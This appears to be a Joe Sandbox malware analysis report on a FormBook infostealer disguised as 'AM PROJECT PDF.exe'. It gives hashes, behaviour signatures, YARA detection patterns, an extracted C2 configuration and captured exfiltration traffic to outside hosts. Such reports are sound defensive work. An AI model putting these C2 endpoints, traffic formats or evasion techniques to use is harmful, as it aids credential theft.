Edit tour

Windows Analysis Report
AM PROJECT PDF.exe

Overview

General Information

Sample Name:	AM PROJECT PDF.exe
Analysis ID:	708243
MD5:	05069262cd099b2e37afb5afe629d12d
SHA1:	5abfb565897213b0f747fa1843822e4b8b201f7d
SHA256:	ba162d7df1cd1beb851a29a69054491959d8ee6ad27f18b3e9dc57a3f6df1122
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Deletes itself after installation

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

AM PROJECT PDF.exe (PID: 5088 cmdline: "C:\Users\user\Desktop\AM PROJECT PDF.exe" MD5: 05069262CD099B2E37AFB5AFE629D12D)

AM PROJECT PDF.exe (PID: 2104 cmdline: C:\Users\user\Desktop\AM PROJECT PDF.exe MD5: 05069262CD099B2E37AFB5AFE629D12D)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 1092 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.texasfirsthonda.com/rdny/"], "decoy": ["YRF12bO2pd49faW4UzTvrJzXWL/bf1MDOw==", "F4vBUcAt7jUgbXBJ", "/I/yHgE4NrnX/69c", "fVXBOjIn1JvtUbyaEA==", "US2MK5jWbG3A6UiTbTaoXA==", "hiSLAGDR+C8gbXBJ", "VPsw1ki7cFOrtbxFyp4GoPQ04vwI8w==", "+WO4/vgbq3qspGz+h2j/s/Y04vwI8w==", "SvNJK4l8SXyunkOOd2LkmhcNuF2IQbU=", "POJGLKrcxvhwrlmIRTLZewmZOaQ=", "w16DIwszB9wRUsGqeM6E2amdwg==", "bOswTj2od6cNSnANu0Mz8MA=", "eDKOBWGpQDGO+RwWemIUujLA3Ase/ZLW", "fglVcE90+x6AttuCZ0k7Jdrn1Q==", "P6/189IYImqYjDKXEOGiHBYZ", "7H3sn/0a9i3AwGr2sEMz8MA=", "uCBh7e4gOIegCrZe", "jwtUfFiKkN5IiE0O67hm2eAA", "MA+EkGiWJBuL+r3tnIVPBKz9t12IQbU=", "ZAhxAV2YsSqhqzpyT0kFfYLEqxEO", "CZcAQhkAubagCrZe", "dmPG8NQG6+s8LPYLom46Jdrn1Q==", "jx9lsKUAuq4RFahZG9iODQwO", "kjeS5tQNHn23+s+ILPw=", "43fYXwgevrWgCrZe", "G7cdOxJMS4e0MktnHgOt", "IpsZlImAquQSUbyaEA==", "vCmC1bvEmaYHBaLnskMz8MA=", "r0qvlf0B2RiCv+KISzzngQmZOaQ=", "AbkH/XVnJl3B+s+ILPw=", "4afkGvTtrrWgCrZe", "qGuk68Xk+UOU2AD5YSCIFtclwF2IQbU=", "QNI2b16JgCtXxN4=", "OeU8e1+tSpP3", "Tt5fziyMU7MjiaAdvEMz8MA=", "7q/nDgx/UpADbNeyLCGtJdrn1Q==", "vJLmHwYJxvFNgDvcZj6tJdrn1Q==", "VLbzJBZVVJKgCrZe", "ZAZl2z2TpP8vWP9lYCKl", "RMEBg3KtSpP3", "UwlMenDrv+JEhrJNIqE95LQLsl2IQbU=", "JPs7u6+Gh7zp1Hp2HNiiHBYZ", "RA9+G5LnpQgxLA==", "CfVRVDJ1Hx9JeSxsjzQpVA==", "XSGIhFqluCeDtdOBjzQpVA==", "41WhkV/leqb9", "bt0kNyuiYWHd4Xrsh0jffgmZOaQ=", "QeEv/GWWqOgWUbyaEA==", "71GKdeDmt+hLgipojzQpVA==", "xlCH91W6ng5JZRxujzQpVA==", "2Wa5Z9MMBT+v2pykSzoUQ/Av4vwI8w==", "i2HMW7v+E0x01vjejzQpVA==", "oBVQ0r+mXFSblzZujzQpVA==", "8boNjgB2S0KYDC8mzrSiHBYZ", "D7MgKRRXTnXL955OEtU43uIqr4wG", "2q8cHZeKXpPtUbyaEA==", "Jqb8LvwA1gd1rmk4EN2iHBYZ", "JK8MteSpUVzq", "gmjgsQ8sPrYwPvzzalNDJdrn1Q==", "DoO/pwsX9Al79SScEeKiHBYZ", "22Xc0Lks7StXxN4=", "5qrsR0SRK3Dk", "RB6DN6YI2+gfT2mCOiDMZpUqr4wG", "q2uwBvgkJFt87ptU"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f200:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa92f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17e47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17c45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x176f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17d47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17ebf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa4fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1693c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1de57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ef6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a139:$sqlite3step: 68 34 1C 7B E1 0x1acb1:$sqlite3step: 68 34 1C 7B E1 0x1a17b:$sqlite3text: 68 38 2A 90 C5 0x1acf6:$sqlite3text: 68 38 2A 90 C5 0x1a192:$sqlite3blob: 68 53 D8 7F 8C 0x1ad0c:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f200:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa92f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17e47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17c45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x176f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17d47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17ebf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa4fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1693c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1de57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ef6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a139:$sqlite3step: 68 34 1C 7B E1 0x1acb1:$sqlite3step: 68 34 1C 7B E1 0x1a17b:$sqlite3text: 68 38 2A 90 C5 0x1acf6:$sqlite3text: 68 38 2A 90 C5 0x1a192:$sqlite3blob: 68 53 D8 7F 8C 0x1ad0c:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6d38:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f937:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb066:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1857e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1837c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17e28:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1847e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x185f6:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xac31:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x17073:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1e58e:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f6a1:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a870:$sqlite3step: 68 34 1C 7B E1 0x1b3e8:$sqlite3step: 68 34 1C 7B E1 0x1a8b2:$sqlite3text: 68 38 2A 90 C5 0x1b42d:$sqlite3text: 68 38 2A 90 C5 0x1a8c9:$sqlite3blob: 68 53 D8 7F 8C 0x1b443:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f200:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa92f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17e47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17c45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x176f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17d47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17ebf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa4fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1693c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1de57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ef6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a139:$sqlite3step: 68 34 1C 7B E1 0x1acb1:$sqlite3step: 68 34 1C 7B E1 0x1a17b:$sqlite3text: 68 38 2A 90 C5 0x1acf6:$sqlite3text: 68 38 2A 90 C5 0x1a192:$sqlite3blob: 68 53 D8 7F 8C 0x1ad0c:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10200:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8e47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x86f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8d47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8ebf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x793c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xee57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xff6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb139:$sqlite3step: 68 34 1C 7B E1 0xbcb1:$sqlite3step: 68 34 1C 7B E1 0xb17b:$sqlite3text: 68 38 2A 90 C5 0xbcf6:$sqlite3text: 68 38 2A 90 C5 0xb192:$sqlite3blob: 68 53 D8 7F 8C 0xbd0c:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.425240569.0000000001050000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0xa92f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10200:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8e47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x86f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8d47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8ebf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x793c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xee57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xff6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb139:$sqlite3step: 68 34 1C 7B E1 0xbcb1:$sqlite3step: 68 34 1C 7B E1 0xb17b:$sqlite3text: 68 38 2A 90 C5 0xbcf6:$sqlite3text: 68 38 2A 90 C5 0xb192:$sqlite3blob: 68 53 D8 7F 8C 0xbd0c:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: AM PROJECT PDF.exe PID: 5088	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: AM PROJECT PDF.exe PID: 2104	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xbc46e:$a1: 3C 30 50 4F 53 54 74 09 40 0xf3592:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: svchost.exe PID: 1092	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xf0d2:$a1: 3C 30 50 4F 53 54 74 09 40 0x3b60d:$a1: 3C 30 50 4F 53 54 74 09 40 0x758b5:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 24 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: AM PROJECT PDF.exe	ReversingLabs: Detection: 76%
Source: AM PROJECT PDF.exe	Metadefender: Detection: 44%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: AM PROJECT PDF.exe

Joe Sandbox ML: detected

Source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.texasfirsthonda.com/rdny/"], "decoy": ["YRF12bO2pd49faW4UzTvrJzXWL/bf1MDOw==", "F4vBUcAt7jUgbXBJ", "/I/yHgE4NrnX/69c", "fVXBOjIn1JvtUbyaEA==", "US2MK5jWbG3A6UiTbTaoXA==", "hiSLAGDR+C8gbXBJ", "VPsw1ki7cFOrtbxFyp4GoPQ04vwI8w==", "+WO4/vgbq3qspGz+h2j/s/Y04vwI8w==", "SvNJK4l8SXyunkOOd2LkmhcNuF2IQbU=", "POJGLKrcxvhwrlmIRTLZewmZOaQ=", "w16DIwszB9wRUsGqeM6E2amdwg==", "bOswTj2od6cNSnANu0Mz8MA=", "eDKOBWGpQDGO+RwWemIUujLA3Ase/ZLW", "fglVcE90+x6AttuCZ0k7Jdrn1Q==", "P6/189IYImqYjDKXEOGiHBYZ", "7H3sn/0a9i3AwGr2sEMz8MA=", "uCBh7e4gOIegCrZe", "jwtUfFiKkN5IiE0O67hm2eAA", "MA+EkGiWJBuL+r3tnIVPBKz9t12IQbU=", "ZAhxAV2YsSqhqzpyT0kFfYLEqxEO", "CZcAQhkAubagCrZe", "dmPG8NQG6+s8LPYLom46Jdrn1Q==", "jx9lsKUAuq4RFahZG9iODQwO", "kjeS5tQNHn23+s+ILPw=", "43fYXwgevrWgCrZe", "G7cdOxJMS4e0MktnHgOt", "IpsZlImAquQSUbyaEA==", "vCmC1bvEmaYHBaLnskMz8MA=", "r0qvlf0B2RiCv+KISzzngQmZOaQ=", "AbkH/XVnJl3B+s+ILPw=", "4afkGvTtrrWgCrZe", "qGuk68Xk+UOU2AD5YSCIFtclwF2IQbU=", "QNI2b16JgCtXxN4=", "OeU8e1+tSpP3", "Tt5fziyMU7MjiaAdvEMz8MA=", "7q/nDgx/UpADbNeyLCGtJdrn1Q==", "vJLmHwYJxvFNgDvcZj6tJdrn1Q==", "VLbzJBZVVJKgCrZe", "ZAZl2z2TpP8vWP9lYCKl", "RMEBg3KtSpP3", "UwlMenDrv+JEhrJNIqE95LQLsl2IQbU=", "JPs7u6+Gh7zp1Hp2HNiiHBYZ", "RA9+G5LnpQgxLA==", "CfVRVDJ1Hx9JeSxsjzQpVA==", "XSGIhFqluCeDtdOBjzQpVA==", "41WhkV/leqb9", "bt0kNyuiYWHd4Xrsh0jffgmZOaQ=", "QeEv/GWWqOgWUbyaEA==", "71GKdeDmt+hLgipojzQpVA==", "xlCH91W6ng5JZRxujzQpVA==", "2Wa5Z9MMBT+v2pykSzoUQ/Av4vwI8w==", "i2HMW7v+E0x01vjejzQpVA==", "oBVQ0r+mXFSblzZujzQpVA==", "8boNjgB2S0KYDC8mzrSiHBYZ", "D7MgKRRXTnXL955OEtU43uIqr4wG", "2q8cHZeKXpPtUbyaEA==", "Jqb8LvwA1gd1rmk4EN2iHBYZ", "JK8MteSpUVzq", "gmjgsQ8sPrYwPvzzalNDJdrn1Q==", "DoO/pwsX9Al79SScEeKiHBYZ", "22Xc0Lks7StXxN4=", "5qrsR0SRK3Dk", "RB6DN6YI2+gfT2mCOiDMZpUqr4wG", "q2uwBvgkJFt87ptU"]}

Source: AM PROJECT PDF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: AM PROJECT PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AM PROJECT PDF.exe, AM PROJECT PDF.exe, 00000006.00000003.298761363.0000000000FA0000.00000004.00000800.00020000.00000000.sdmp, AM PROJECT PDF.exe, 00000006.00000002.425540663.0000000001140000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.428928330.0000000003600000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.526559098.0000000003800000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.528369873.000000000391F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.423937815.0000000003400000.00000004.00000800.00020000.00000000.sdmp

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.fellyhub.com
Source: C:\Windows\explorer.exe	Domain query: www.soraligne.com
Source: C:\Windows\explorer.exe	Network Connect: 162.241.194.111 80
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.texasfirsthonda.com/rdny/

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: global traffic	HTTP traffic detected: GET /rdny/?7n-=6lYX&A0G=dZ8Ayr2drPdNVPVmuvzgGnZ5EDtn0CBwsWjIF75G8uy0K/UwgFE8TCCkfo+4feZhoJ7iWr04K24a/vrIrcJXcRwwE/YP1kXGBw== HTTP/1.1Host: www.fellyhub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rdny/?A0G=nirRoMghSnbgIhB91EMNSfP7/7ht0QeVg0GeLwyPWvopBgzqt2G+p533L6eaW6GeyJy3z9ND4nEybKooy0llY69rAo//5MT1xA==&7n-=6lYX HTTP/1.1Host: www.soraligne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	HTTP traffic detected: POST /rdny/ HTTP/1.1Host: www.soraligne.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.soraligne.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.soraligne.com/rdny/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4e 58 74 58 76 47 59 6d 58 4f 4c 4b 34 50 70 68 70 54 65 41 71 56 4b 46 4b 56 44 78 55 64 5a 77 41 6d 7e 7a 68 57 57 71 77 37 79 4d 52 4c 65 76 62 74 53 66 38 4a 37 46 7a 36 46 5f 38 31 51 38 55 4b 64 42 39 32 73 52 54 6f 31 74 61 59 6d 36 36 65 37 56 77 41 6b 55 58 75 32 6c 76 41 69 53 51 6f 6b 4c 50 42 35 55 5a 67 6e 6c 35 34 70 37 58 36 51 58 4d 63 35 6f 51 33 65 4e 39 45 4e 4f 71 38 69 65 49 44 46 30 6a 35 32 31 4c 63 52 64 6a 38 77 6a 56 56 51 37 30 56 53 76 66 4f 59 5f 4d 65 55 34 31 34 65 42 7e 4e 68 77 6b 42 68 73 46 77 7e 38 4d 36 6d 42 61 61 6b 51 4c 47 33 57 55 68 65 4b 69 4c 70 77 42 4c 78 4d 49 6a 44 6d 79 46 4f 30 79 31 38 47 74 32 58 4a 77 31 66 67 4c 6b 6e 74 61 4c 67 41 41 4c 68 44 63 59 74 4f 61 61 65 57 51 6c 45 71 6a 61 31 53 79 31 52 31 74 6b 54 51 36 53 4c 61 58 71 53 38 38 65 4b 31 73 6b 71 6d 7e 59 4f 4d 74 42 56 66 33 47 47 47 4f 6f 38 57 59 6b 70 61 28 6a 59 72 39 57 4f 79 38 44 39 34 79 48 76 6c 50 58 39 66 34 51 37 75 48 5a 6e 59 65 4a 71 5f 78 6f 59 6e 74 6d 6c 52 35 48 79 61 36 77 46 36 76 79 75 58 34 6c 35 51 48 54 4d 65 30 44 6e 72 57 5f 54 47 6e 30 79 38 44 31 5a 6c 39 76 69 4d 69 43 49 6e 39 55 33 4c 4e 73 54 7a 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: A0G=qgDxr4VVeFbjNXtXvGYmXOLK4PphpTeAqVKFKVDxUdZwAm~zhWWqw7yMRLevbtSf8J7Fz6F_81Q8UKdB92sRTo1taYm66e7VwAkUXu2lvAiSQokLPB5UZgnl54p7X6QXMc5oQ3eN9ENOq8ieIDF0j521LcRdj8wjVVQ70VSvfOY_MeU414eB~NhwkBhsFw~8M6mBaakQLG3WUheKiLpwBLxMIjDmyFO0y18Gt2XJw1fgLkntaLgAALhDcYtOaaeWQlEqja1Sy1R1tkTQ6SLaXqS88eK1skqm~YOMtBVf3GGGOo8WYkpa(jYr9WOy8D94yHvlPX9f4Q7uHZnYeJq_xoYntmlR5Hya6wF6vyuX4l5QHTMe0DnrW_TGn0y8D1Zl9viMiCIn9U3LNsTzmQ).
Source: global traffic	HTTP traffic detected: POST /rdny/ HTTP/1.1Host: www.soraligne.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.soraligne.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.soraligne.com/rdny/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4e 67 78 58 73 31 41 6d 44 2d 4c 4b 78 76 70 6a 70 54 65 62 71 56 4b 42 4b 51 75 36 55 50 35 77 44 30 57 7a 69 6b 75 71 78 37 79 4e 5a 72 65 6a 57 4e 54 4c 38 4a 36 71 7a 5f 6c 5f 38 31 30 38 55 4c 42 42 39 48 73 51 53 6f 31 76 4a 59 6e 73 77 2d 37 4d 77 41 35 44 58 71 7e 6c 76 44 4b 53 51 5a 6b 4c 50 7a 52 56 63 41 6e 6b 32 59 70 67 65 61 52 57 4d 63 35 47 51 33 66 6f 39 48 31 4f 71 49 47 65 4a 6c 52 37 36 70 32 74 4b 63 51 69 6c 50 74 4d 65 6c 73 4d 28 54 6a 65 55 59 6c 64 5a 63 5a 77 70 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 